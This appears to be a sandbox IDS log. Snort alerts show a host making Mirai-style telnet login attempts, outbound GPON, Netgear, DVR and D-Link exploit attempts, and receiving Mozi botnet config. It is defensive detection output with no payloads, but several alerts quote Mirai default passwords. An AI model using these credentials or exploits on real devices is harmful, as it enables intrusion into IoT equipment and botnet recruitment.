Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.77.238.132: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.247.73: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.22.139: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 122.228.249.221: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43610 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.146.9: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43620 |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 95.211.103.19: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.167.77: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.76.41.4: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.16.5.51: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 121.127.240.171: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.244.147.91: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.66.240.0: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43626 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.251.124: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.12.82: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.56.185.133: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.12.212.10: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36484 -> 34.90.159.216:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36484 -> 34.90.159.216:80 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43664 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.220.105: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.143.229.1: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43914 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43922 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43936 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43938 |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 45.66.122.140: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43974 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.44.132.119: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.229.122: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 184.105.35.86: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 187.9.231.26: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44216 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.168.227.106: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.204.138.252: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.77.64.1: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44220 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.203.134.203: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 63.143.96.217:8000 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44244 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.12.236: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.44.112.190: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.83.146:58148 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44250 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 218.86.84.189:1111 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 209.51.191.242: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.17.32.41: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44512 |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 115.114.112.90: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:44532 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.128:22104 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.151.184: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 119.253.14.61: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 151.177.190.108:4000 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.71:16802 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.242.113:58745 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.59.137: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.35.102.107: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 78.133.138.166: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.217.98.171: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 187.103.124.110: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.43.107.137: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.95.211.247: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.231.144.28: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.213.211.120: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.54.120.139: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.215.70: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.12.98: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.167.25: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.255.195.11: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.208.68.59: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 109.206.193.130: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 47.229.50.113: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.131.13.8: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 201.10.209.246: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38662 -> 193.176.117.172:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38662 -> 193.176.117.172:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.135.233.46: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.170.129.57: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.181: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54674 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54678 |
Source: Traffic | Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.20:54678 -> 86.125.215.125:23 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54680 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54682 |
Source: Traffic | Snort IDS: 2023443 ET TROJAN Possible Linux.Mirai Login Attempt (klv123) 192.168.2.20:54682 -> 86.125.215.125:23 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54684 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54722 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54730 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.227.188.172: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54734 |
Source: Traffic | Snort IDS: 2023439 ET TROJAN Possible Linux.Mirai Login Attempt (hi3518) 192.168.2.20:54734 -> 86.125.215.125:23 |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.91.11.89: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54946 |
Source: Traffic | Snort IDS: 2023436 ET TROJAN Possible Linux.Mirai Login Attempt (anko) 192.168.2.20:54946 -> 86.125.215.125:23 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56306 -> 159.138.143.231:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56306 -> 159.138.143.231:80 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54956 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.54.37.162: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.196.195.2: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54968 |
Source: Traffic | Snort IDS: 2023434 ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0vizxv) 192.168.2.20:54968 -> 86.125.215.125:23 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54970 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54976 |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54978 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.165.153.254: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 716 INFO TELNET access 86.125.215.125:23 -> 192.168.2.20:54980 |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 208.126.19.231: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 68.115.35.242: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 107.165.48.81: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.89.78.198: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.221.96.235: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38558 -> 216.92.218.45:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38558 -> 216.92.218.45:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.144.22.98: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.66.165.152: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.167.170: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.223.209.67: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.234.234.92: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.200.252: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 200.155.33.253: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.211.141.231: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.231.46.84: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 92.61.32.163: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.99.69: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 114.231.120.179: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.250.140: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 10.220.105.45: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50210 -> 23.6.11.241:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50210 -> 23.6.11.241:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.11.241:80 -> 192.168.2.20:50210 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.72.254.150: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.206.175.206: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 141.64.0.6: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.26.181.228:8080 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.250.149: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.94.155: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50454 -> 69.195.90.130:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50454 -> 69.195.90.130:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57946 -> 184.29.252.151:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57946 -> 184.29.252.151:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.29.252.151:80 -> 192.168.2.20:57946 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.230.193.38: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41912 -> 52.192.234.143:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41912 -> 52.192.234.143:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.37.98.208: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.154.84.219: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33260 -> 3.11.29.16:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41564 -> 120.25.215.76:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41564 -> 120.25.215.76:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35870 -> 47.108.201.233:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35870 -> 47.108.201.233:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.201.101.67: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.132.248.162: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38446 -> 156.244.87.14:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38446 -> 156.244.87.14:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.215.27.127: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.164.160.90: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.138.217:65176 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.117.123.50: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 193.77.221.73: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53946 -> 142.92.252.36:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53946 -> 142.92.252.36:80 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.39.15: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.116.90.98: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.161.95.20: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.23.114:1900 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.41.25.150:54444 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.201.195.174:4000 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33316 -> 23.223.90.123:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33316 -> 23.223.90.123:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.90.123:80 -> 192.168.2.20:33316 |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.166.157.83: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.25.228.4: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.181.148:4000 -> 192.168.2.20:8000 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:47544 -> 23.61.13.112:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:47544 -> 23.61.13.112:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.61.13.112:80 -> 192.168.2.20:47544 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37564 -> 81.2.194.201:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37564 -> 81.2.194.201:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60742 -> 13.58.205.33:8080 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60742 -> 13.58.205.33:8080 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:46956 -> 51.182.50.200:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:46956 -> 51.182.50.200:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40652 -> 104.72.178.146:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40652 -> 104.72.178.146:80 |
Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.178.146:80 -> 192.168.2.20:40652 |
Source: Traffic | Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.236.70: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.33.143: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.140.79: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59032 -> 85.23.70.174:80 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59032 -> 85.23.70.174:80 |
Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59348 -> 95.217.3.9:80 |
Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59348 -> 95.217.3.9:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38708 -> 204.85.28.95:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38708 -> 204.85.28.95:80 |
Source: Traffic | Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36964 -> 47.96.100.38:80 |
Source: Traffic | Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36964 -> 47.96.100.38:80 |
Source: Traffic | Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40456 -> 35.201.127.68:8080 |
Source: Traffic | Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40456 -> 35.201.127.68:8080 |
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.136.134.150: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 163.28.1.241: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.93.139: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.183.25.195: -> 192.168.2.20: |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44746 -> 220.130.214.100:80 |
Source: Traffic | Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34312 -> 121.5.104.125:80 |
Source: global traffic | TCP traffic: 46.254.1.124 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 217.196.154.24 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 77.190.22.139 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 26.95.223.242 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 34.46.25.239 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 138.94.203.237 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 160.49.32.226 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 92.171.56.228 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 82.134.248.77 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 199.218.221.131 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 159.162.153.137 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 26.139.153.168 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 142.143.222.228 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 14.106.178.189 ports 2,5,6,8,9,52869 |
